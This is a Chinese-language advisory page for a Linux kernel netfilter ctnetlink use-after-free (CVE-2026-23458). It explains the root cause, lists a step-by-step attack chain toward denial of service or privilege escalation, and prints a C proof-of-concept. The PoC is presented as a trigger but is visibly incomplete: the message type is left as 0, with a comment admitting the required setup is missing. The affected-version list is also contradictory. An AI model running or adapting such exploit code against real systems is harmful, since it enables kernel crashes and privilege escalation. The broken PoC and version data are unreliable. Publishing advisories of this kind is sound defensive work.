CVE-2026-23458 CVSS 7.8 高危

CVE-2026-23458 Linux内核ctnetlink释放后重用漏洞

披露日期: 2026-04-03

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-23458

漏洞类型

释放后重用

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核netfilter子系统的ctnetlink模块存在释放后重用漏洞。攻击者利用该漏洞可在本地触发内核崩溃或潜在的权限提升。

技术细节

该漏洞发生在`ctnetlink_dump_exp_ct`函数中，该函数处理conntrack期望转储。它将conntrack指针存储在`cb->data`中，但在`netlink_dump_start()`之后立即释放了该引用。当转储操作跨越多个消息时，第二次`recvmsg()`调用会触发回调`ctnetlink_exp_ct_dump_table`，该回调尝试通过`nfct_help(ct)`访问已释放的内存，导致UAF。修复方法是在`netlink_dump_control`中添加`.start`和`.done`回调，以在转储期间正确持有和释放conntrack引用。

攻击链分析

STEP 1

1. 准备环境

攻击者获取本地低权限用户访问权限。

STEP 2

2. 创建Socket

攻击者创建一个NETLINK_NETFILTER类型的套接字。

STEP 3

3. 触发Dump

发送特定的Netlink消息请求转储连接跟踪期望表。

STEP 4

4. 利用UAF

当内核处理转储请求并在多个轮次中返回数据时，第二次接收消息会触发回调，访问已释放的内存。

STEP 5

5. 执行攻击

导致内核崩溃（拒绝服务）或通过精心构造的内存布局实现权限提升。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-23458
 * This PoC triggers the use-after-free in ctnetlink_dump_exp_ct
 * by performing a netlink dump that spans multiple messages.
 * Compile: gcc -o poc cve_2026_23458.c
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>

#define NETLINK_NETFILTER 12

int main() {
    int sock_fd;
    struct sockaddr_nl sa;
    char buf[8192];
    struct nlmsghdr *nlh;
    struct iovec iov = { buf, sizeof(buf) };
    struct msghdr msg = { &sa, sizeof(sa), &iov, 1, NULL, 0, 0 };

    // Create Netlink socket
    sock_fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER);
    if (sock_fd < 0) {
        perror("socket");
        return -1;
    }

    memset(&sa, 0, sizeof(sa));
    sa.nl_family = AF_NETLINK;
    sa.nl_pid = getpid();

    if (bind(sock_fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
        perror("bind");
        close(sock_fd);
        return -1;
    }

    // Construct a dump request message
    // Note: Specific attributes required to trigger the exact path may vary
    memset(buf, 0, sizeof(buf));
    nlh = (struct nlmsghdr *)buf;
    nlh->nlmsg_len = NLMSG_LENGTH(0);
    nlh->nlmsg_type = 0; // IPCTNL_MSG_CT_GET_EXPECT (Needs specific type setup based on internal kb)
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_DUMP;
    nlh->nlmsg_pid = getpid();

    // Send the request
    sendmsg(sock_fd, &msg, 0);

    // Loop to receive messages
    // The UAF is triggered when the dump spans multiple recvmsg calls
    while (1) {
        int len = recvmsg(sock_fd, &msg, 0);
        if (len < 0) {
            perror("recvmsg");
            break;
        }
        if (len == 0) break;

        if (nlh->nlmsg_type == NLMSG_DONE) {
            break;
        }
    }

    close(sock_fd);
    return 0;
}

影响范围

Linux Kernel < 6.6

Linux Kernel < 6.1

Linux Kernel < 5.15

Linux Kernel < 5.10

Linux Kernel < 5.4

防御指南

临时缓解措施

建议及时更新Linux内核至修复版本。若无法立即更新，可限制本地非特权用户的权限，减少对Netfilter套接字的访问，从而降低攻击风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表